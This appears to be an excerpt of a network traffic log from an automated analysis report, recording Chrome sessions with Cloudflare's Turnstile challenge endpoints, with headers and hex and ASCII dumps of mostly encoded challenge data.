                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 62 56 36 50 59 34 42 50 53 5a 42 64 6b 49 42 34 56 34 35 34 56 57 6d 4e 69 6f 39 75 6f 6f 78 79 6f 31 74 6a 6b 71 43 63 65 49 65 73 68 32 6d 77 71 57 65 54 6f 34 65 48 6a 5a 53 41 62 35 5a 79 73 6e 4f 59 69 37 2b 55 6e 62 61 4e 74 37 4f 57 67 4b 53 4b 68 35 36 4b 6e 37 69 61 77 38 57 51 6b 4d 72 57 74 38 2b 31 6b 74 65 34 79 35 6e 66 71 71 43 38 72 72 71 33 74 37 4b 67 75 4e 62 55 32 63 62 61 34 38 2f 6c 37 61 58 50 33 2f 66 4f 35 74 50 35 7a 65 33 7a 31 50 69 33 33 4d 48 44 7a 74 4c 61 30 4e 61 2f 31 39 2f 68 41 4e 34 49 45 4f 37 61 7a 77 34 44 33 38 37 71 45 75 6e 32 35 41 76 79 49 42 63 50 39 4f 30 6a 48 2f 6b 5a 38 50 58 38 48 43 59 75 44 54 41 4a 4a 51 41 6d 38 67 2f 79 39 7a 72 33 42 7a 33 30 46 7a 45 76 49 43 4a 44 46 67 51 55 49 77 41 70 52 6b 59
                                                                                                                                                                                                                                      Data Ascii: bV6PY4BPSZBdkIB4V454VWmNio9uooxyo1tjkqCceIesh2mwqWeTo4eHjZSAb5ZysnOYi7+UnbaNt7OWgKSKh56Kn7iaw8WQkMrWt8+1kte4y5nfqqC8rrq3t7KguNbU2cba48/l7aXP3/fO5tP5ze3z1Pi33MHDztLa0Na/19/hAN4IEO7azw4D387qEun25AvyIBcP9O0jH/kZ8PX8HCYuDTAJJQAm8g/y9zr3Bz30FzEvICJDFgQUIwApRkY
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 32 4f 45 68 49 42 56 6c 47 39 36 63 46 4b 65 57 58 52 37 69 33 4a 6a 58 5a 46 2f 65 36 6c 34 70 35 57 43 61 47 69 59 6f 58 71 7a 69 61 56 74 66 33 61 43 74 71 4e 74 72 6e 4f 79 65 4a 6d 30 6f 5a 6e 41 6b 70 68 35 70 72 32 68 6e 71 61 44 7a 62 6e 4e 71 59 36 2b 6e 36 62 52 72 61 4f 68 32 35 48 4b 6d 39 66 61 77 4c 54 4f 6e 72 36 38 31 63 66 42 70 38 65 69 32 63 62 4c 71 73 54 72 78 63 7a 50 33 63 7a 57 7a 72 4c 72 37 74 66 6e 74 72 47 36 41 37 2f 58 76 76 76 46 38 67 6e 45 41 41 50 33 39 73 54 47 42 67 66 76 34 77 38 57 34 2f 45 55 36 39 62 34 46 2f 50 7a 47 4e 38 58 39 75 77 66 44 76 4d 42 38 43 66 34 42 51 55 4c 36 7a 41 47 4a 69 41 4c 45 4f 73 41 45 44 4d 53 44 42 55 46 44 2f 34 4b 44 41 45 4f 41 77 49 37 51 53 46 4a 47 42 38 4d 4e 78 63 46 43 55 51 78
                                                                                                                                                                                                                                      Data Ascii: 2OEhIBVlG96cFKeWXR7i3JjXZF/e6l4p5WCaGiYoXqziaVtf3aCtqNtrnOyeJm0oZnAkph5pr2hnqaDzbnNqY6+n6bRraOh25HKm9fawLTOnr681cfBp8ei2cbLqsTrxczP3czWzrLr7tfntrG6A7/XvvvF8gnEAAP39sTGBgfv4w8W4/EU69b4F/PzGN8X9uwfDvMB8Cf4BQUL6zAGJiALEOsAEDMSDBUFD/4KDAEOAwI7QSFJGB8MNxcFCUQx


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      20192.168.2.1649745104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:36 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1983417942:1736270882:GHoc2fFjXXTeUPHab0fnxkH_ZMOKbETBkUUeI55wVUk/8fe5cd656b664309/vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:36 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:36 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Content-Length: 7
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                      cf-chl-out: nEuODolTAjbRNJVXAFDykXg/y5R9iITJ9+A=$CN+h/E7ag6D/VDTg
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd75d8764310-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:36 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                      Data Ascii: invalid


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      21192.168.2.1649746104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:36 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8fe5cd656b664309/1736272355851/dedc7b011d73c1bf6e1bc0d43b269d006b7b0ba3cc013e3b5183795105288edc/6-1OoBsC45h5gCa HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:37 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 1
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:37 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 33 74 78 37 41 52 31 7a 77 62 39 75 47 38 44 55 4f 79 61 64 41 47 74 37 43 36 50 4d 41 54 34 37 55 59 4e 35 55 51 55 6f 6a 74 77 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                      Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g3tx7AR1zwb9uG8DUOyadAGt7C6PMAT47UYN5UQUojtwAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                      2025-01-07 17:52:37 UTC1INData Raw: 4a
                                                                                                                                                                                                                                      Data Ascii: J


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      22192.168.2.1649747104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:38 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe5cd656b664309/1736272355861/hkBWC5gd4FFlI6b HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:38 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:38 GMT
                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd7eade743b7-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:38 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 37 00 00 00 46 08 02 00 00 00 e7 c7 9b 75 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                      Data Ascii: PNGIHDR7FuIDAT$IENDB`


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      23192.168.2.1649748104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:38 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe5cd656b664309/1736272355861/hkBWC5gd4FFlI6b HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:38 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:38 GMT
                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd8259224340-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:38 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 37 00 00 00 46 08 02 00 00 00 e7 c7 9b 75 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                      Data Ascii: PNGIHDR7FuIDAT$IENDB`


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      24192.168.2.1649749104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:38 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1983417942:1736270882:GHoc2fFjXXTeUPHab0fnxkH_ZMOKbETBkUUeI55wVUk/8fe5cd656b664309/vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Content-Length: 32375
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      CF-Challenge: vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:38 UTC16384OUTData Raw: 76 5f 38 66 65 35 63 64 36 35 36 62 36 36 34 33 30 39 3d 72 38 6d 7a 39 55 74 58 66 55 66 64 6d 64 65 74 24 73 6d 7a 55 6d 73 53 64 48 77 54 77 54 7a 55 46 74 41 77 46 52 24 61 74 52 66 74 31 77 5a 77 41 32 53 55 25 32 62 77 51 7a 6b 50 6a 7a 77 2d 6d 68 43 77 34 61 55 31 77 37 44 61 7a 77 62 7a 73 65 77 50 39 4f 74 6d 77 67 7a 41 36 77 7a 7a 77 63 66 6d 57 34 7a 55 56 2b 77 45 6d 74 54 77 41 4f 61 46 76 77 74 75 4d 48 77 61 46 74 75 58 71 6c 6a 7a 74 78 79 7a 63 74 59 68 57 51 4c 59 7a 79 77 41 2d 61 77 74 6a 43 79 73 63 77 73 46 77 6b 57 61 74 6b 79 73 46 43 41 7a 37 38 53 71 39 38 4f 31 48 77 55 48 53 38 44 78 39 6d 68 71 53 77 63 4f 66 39 37 35 64 56 57 61 77 6e 67 44 63 43 48 7a 65 37 74 74 53 43 6d 70 51 48 4e 6a 24 77 5a 69 52 32 24 71 54 78 44 4b
                                                                                                                                                                                                                                      Data Ascii: v_8fe5cd656b664309=r8mz9UtXfUfdmdet$smzUmsSdHwTwTzUFtAwFR$atRft1wZwA2SU%2bwQzkPjzw-mhCw4aU1w7DazwbzsewP9OtmwgzA6wzzwcfmW4zUV+wEmtTwAOaFvwtuMHwaFtuXqljztxyzctYhWQLYzywA-awtjCyscwsFwkWatkysFCAz78Sq98O1HwUHS8Dx9mhqSwcOf975dVWawngDcCHze7ttSCmpQHNj$wZiR2$qTxDK
                                                                                                                                                                                                                                      2025-01-07 17:52:38 UTC15991OUTData Raw: 77 4b 78 6d 2d 4e 55 53 77 2b 7a 6b 7a 36 77 74 42 41 53 77 77 61 45 53 75 59 56 61 41 49 4d 79 6f 37 77 41 37 76 63 77 71 77 74 61 77 70 77 5a 36 37 6a 77 64 77 31 7a 73 6c 7a 38 77 73 7a 73 6a 6c 48 77 74 7a 37 71 72 2d 77 69 7a 73 36 74 31 77 37 78 53 37 74 71 77 58 61 41 53 77 64 66 35 61 64 36 77 79 77 42 61 73 38 77 4d 77 61 46 73 65 77 66 77 69 46 41 6a 77 68 69 71 46 41 58 74 75 77 46 57 74 56 77 4b 61 6c 7a 73 4b 77 2d 77 37 46 64 46 7a 46 77 69 46 77 68 71 52 46 31 35 41 6d 77 32 77 65 77 77 61 77 46 77 45 55 6e 48 76 75 38 74 77 6e 36 77 37 77 74 58 37 6d 77 57 77 59 63 64 38 64 67 72 74 77 64 46 7a 73 46 37 61 45 63 55 71 77 69 46 73 53 55 57 77 44 46 74 56 77 54 6d 61 7a 6e 36 77 33 77 53 66 37 6d 77 37 77 58 5a 64 77 77 48 7a 71 61 56 34 74
                                                                                                                                                                                                                                      Data Ascii: wKxm-NUSw+zkz6wtBASwwaESuYVaAIMyo7wA7vcwqwtawpwZ67jwdw1zslz8wszsjlHwtz7qr-wizs6t1w7xS7tqwXaASwdf5ad6wywBas8wMwaFsewfwiFAjwhiqFAXtuwFWtVwKalzsKw-w7FdFzFwiFwhqRF15Amw2wewwawFwEUnHvu8twn6w7wtX7mwWwYcd8dgrtwdFzsF7aEcUqwiFsSUWwDFtVwTmazn6w3wSf7mw7wXZdwwHzqaV4t
                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC318INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Content-Length: 26268
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cf-chl-gen: ic2NghmINes/YXGBAMVlr1WS8uK+QhPk1zUGctl0kYzcHqds+3cu//mZHYx0g9dbfQk=$963hU5aCsTl8ZOOz
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd82adf5efa1-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC1051INData Raw: 6a 5a 4b 43 5a 59 56 50 63 5a 46 64 56 33 47 62 58 35 56 63 6e 4b 4b 61 6f 36 4f 70 70 34 57 6e 72 61 71 51 62 33 47 75 72 34 78 76 70 6e 71 58 6a 4c 64 2b 71 35 69 63 67 6f 2b 65 66 5a 69 65 74 37 53 61 72 4d 4b 75 78 72 76 4b 6f 73 4c 42 79 4a 4f 6a 78 4d 54 44 71 74 62 56 6d 74 62 65 30 36 2b 55 33 36 50 69 35 73 54 55 79 4e 62 4d 78 37 69 74 33 4e 44 6e 73 66 53 2f 71 37 58 76 7a 4d 79 30 30 74 66 47 30 65 7a 58 39 41 48 42 32 75 48 79 41 2f 30 4c 77 64 58 4a 78 63 6f 4f 38 4f 33 66 42 76 7a 6b 33 78 44 34 35 2b 67 5a 42 2b 6a 77 33 76 76 39 32 75 73 50 34 4f 44 6e 2f 51 59 69 2f 67 59 6f 39 2b 38 61 37 79 33 6c 4b 78 58 7a 49 43 59 79 46 78 55 53 45 50 55 79 46 45 4a 42 4f 78 63 32 2f 41 49 64 53 78 73 73 43 69 34 6a 52 55 73 4a 43 6a 77 4c 52 6c 4d
                                                                                                                                                                                                                                      Data Ascii: jZKCZYVPcZFdV3GbX5VcnKKao6Opp4WnraqQb3Gur4xvpnqXjLd+q5icgo+efZiet7SarMKuxrvKosLByJOjxMTDqtbVmtbe06+U36Pi5sTUyNbMx7it3NDnsfS/q7XvzMy00tfG0ezX9AHB2uHyA/0LwdXJxcoO8O3fBvzk3xD45+gZB+jw3vv92usP4ODn/QYi/gYo9+8a7y3lKxXzICYyFxUSEPUyFEJBOxc2/AIdSxssCi4jRUsJCjwLRlM
                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC1369INData Raw: 45 69 37 43 4e 61 72 4f 6e 6b 5a 43 6c 69 33 4e 79 70 34 65 4a 72 4b 78 2f 6e 49 2b 50 67 70 36 6d 75 5a 69 32 79 70 75 71 6d 72 65 2f 77 73 71 46 6f 4e 47 7a 74 70 43 31 32 4c 4c 5a 31 4a 7a 64 72 39 6a 59 7a 4d 54 68 31 74 50 6a 74 37 4c 6b 6f 73 54 6d 36 72 76 66 33 73 36 6d 34 66 66 6a 38 72 54 6f 36 37 69 76 36 50 44 65 41 41 54 59 34 65 58 39 2b 66 54 64 39 65 59 43 33 67 33 66 44 74 72 45 46 65 37 73 41 73 2f 57 36 52 6e 38 38 76 76 77 31 75 6e 63 44 50 51 46 41 43 48 66 32 75 66 7a 47 52 6f 73 4c 78 6b 76 45 68 77 79 38 53 49 79 44 42 49 73 4c 77 34 54 4f 53 38 73 50 55 44 2b 2f 6a 45 45 50 42 78 4b 48 44 56 4c 4a 44 39 46 44 53 73 50 49 30 67 32 53 55 74 4f 4e 53 52 49 57 44 55 78 48 44 39 4b 51 54 52 64 50 7a 70 58 51 57 64 42 57 69 74 46 56 32
                                                                                                                                                                                                                                      Data Ascii: Ei7CNarOnkZCli3Nyp4eJrKx/nI+Pgp6muZi2ypuqmre/wsqFoNGztpC12LLZ1Jzdr9jYzMTh1tPjt7LkosTm6rvf3s6m4ffj8rTo67iv6PDeAATY4eX9+fTd9eYC3g3fDtrEFe7sAs/W6Rn88vvw1uncDPQFACHf2ufzGRosLxkvEhwy8SIyDBIsLw4TOS8sPUD+/jEEPBxKHDVLJD9FDSsPI0g2SUtONSRIWDUxHD9KQTRdPzpXQWdBWitFV2
                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC1369INData Raw: 6c 4a 2b 41 68 49 35 78 63 70 79 49 6e 4a 52 37 6c 33 57 75 70 4c 69 51 70 6f 47 66 77 49 7a 4c 70 72 2f 47 72 36 6e 45 79 64 48 49 79 4c 43 6e 74 4e 44 59 79 35 65 2b 34 4c 36 63 74 36 48 52 74 64 2b 6d 76 63 48 4b 76 4c 33 50 76 36 66 77 78 38 2b 77 72 74 58 4e 77 39 44 56 75 65 53 34 73 50 72 56 30 37 54 54 42 50 62 46 32 65 48 66 42 73 6b 4b 79 75 49 43 79 75 34 45 38 64 38 56 44 50 50 52 30 42 63 61 48 76 6e 5a 39 43 49 68 41 76 67 64 2b 77 63 56 2b 67 67 47 2f 67 76 70 35 76 63 75 47 2b 72 2b 44 42 48 77 42 65 34 6a 4c 50 51 51 50 7a 48 32 38 76 6f 2f 48 42 68 48 49 76 34 48 4d 79 59 63 54 44 38 4f 49 6b 63 49 48 69 45 67 4e 54 4d 59 4a 31 49 35 54 30 63 72 51 45 45 35 56 52 31 50 4c 54 4e 64 50 56 46 48 52 57 5a 47 62 53 55 34 51 55 39 7a 53 6b 31
                                                                                                                                                                                                                                      Data Ascii: lJ+AhI5xcpyInJR7l3WupLiQpoGfwIzLpr/Gr6nEydHIyLCntNDYy5e+4L6ct6HRtd+mvcHKvL3Pv6fwx8+wrtXNw9DVueS4sPrV07TTBPbF2eHfBskKyuICyu4E8d8VDPPR0BcaHvnZ9CIhAvgd+wcV+ggG/gvp5vcuG+r+DBHwBe4jLPQQPzH28vo/HBhHIv4HMyYcTD8OIkcIHiEgNTMYJ1I5T0crQEE5VR1PLTNdPVFHRWZGbSU4QU9zSk1
                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC1369INData Raw: 4a 5a 37 75 6e 74 2b 73 33 32 6c 78 5a 33 49 79 4c 4b 42 6f 4c 57 6f 77 4a 75 34 71 37 76 47 77 64 58 48 70 4e 50 4f 6d 4d 37 63 74 4d 6d 66 76 4f 48 52 73 4f 4f 67 77 37 61 79 71 4e 4f 6d 78 4f 75 70 36 64 2f 72 36 73 44 50 78 66 4c 4c 30 74 6e 6a 7a 65 72 76 32 63 6d 37 32 62 71 36 34 74 4c 44 34 77 62 78 2b 39 37 6f 42 2b 72 48 41 64 7a 62 2b 2b 34 41 39 4d 33 6f 43 4e 6a 35 46 2f 58 33 39 50 37 64 49 41 58 69 34 42 49 6f 48 41 4d 4a 49 67 34 6a 47 43 77 42 48 44 41 71 49 54 4d 34 49 75 38 49 4c 76 76 31 46 77 38 76 4f 6a 67 52 4f 52 77 57 4d 55 4a 45 41 55 74 47 49 78 70 4e 4a 7a 39 53 42 52 41 6d 51 53 67 6f 57 45 31 56 55 6c 67 2f 50 69 6b 74 49 44 38 66 51 53 42 68 5a 7a 67 71 4a 47 52 5a 54 54 73 70 61 46 78 76 4b 6e 42 53 63 58 45 34 63 32 59 75
                                                                                                                                                                                                                                      Data Ascii: JZ7unt+s32lxZ3IyLKBoLWowJu4q7vGwdXHpNPOmM7ctMmfvOHRsOOgw7ayqNOmxOup6d/r6sDPxfLL0tnjzerv2cm72bq64tLD4wbx+97oB+rHAdzb++4A9M3oCNj5F/X39P7dIAXi4BIoHAMJIg4jGCwBHDAqITM4Iu8ILvv1Fw8vOjgRORwWMUJEAUtGIxpNJz9SBRAmQSgoWE1VUlg/PiktID8fQSBhZzgqJGRZTTspaFxvKnBScXE4c2Yu
                                                                                                                                                                                                                                      2025-01-07 17:52:39 UTC1369INData Raw: 75 53 66 70 72 46 67 59 66 47 72 49 71 6e 6f 4b 2f 4d 73 4c 4b 50 6c 4e 4c 47 6b 34 71 6b 74 70 61 63 78 72 37 63 72 4c 48 6a 30 63 36 6b 70 72 50 6b 75 74 50 4a 34 63 44 72 71 75 6e 70 79 4d 62 53 34 2b 50 70 39 66 48 46 37 63 2b 34 2b 50 4c 62 33 4d 44 36 39 4f 62 42 78 62 2f 63 33 2b 66 45 36 51 73 4e 33 4f 38 46 37 65 6e 32 43 4e 45 58 38 75 54 76 42 75 6a 55 37 69 48 39 41 50 4d 6b 2b 52 48 6e 38 76 58 38 2f 53 34 43 4c 76 73 77 36 44 51 45 4d 79 67 71 43 6a 63 57 42 66 73 46 4d 43 38 4e 39 76 67 52 46 68 37 38 49 42 52 48 51 43 59 67 50 55 51 70 45 42 6f 61 50 69 55 64 45 53 6b 4f 52 78 6c 4e 4c 52 4d 36 56 43 70 68 59 45 34 77 50 54 59 34 4d 56 6c 63 53 6a 31 46 52 6b 78 41 63 54 70 50 51 47 52 4b 63 30 68 6f 4f 55 52 49 4d 33 78 74 55 6e 46 57 54
                                                                                                                                                                                                                                      Data Ascii: uSfprFgYfGrIqnoK/MsLKPlNLGk4qktpacxr7crLHj0c6kprPkutPJ4cDrqunpyMbS4+Pp9fHF7c+4+PLb3MD69ObBxb/c3+fE6QsN3O8F7en2CNEX8uTvBujU7iH9APMk+RHn8vX8/S4CLvsw6DQEMygqCjcWBfsFMC8N9vgRFh78IBRHQCYgPUQpEBoaPiUdESkORxlNLRM6VCphYE4wPTY4MVlcSj1FRkxAcTpPQGRKc0hoOURIM3xtUnFWT
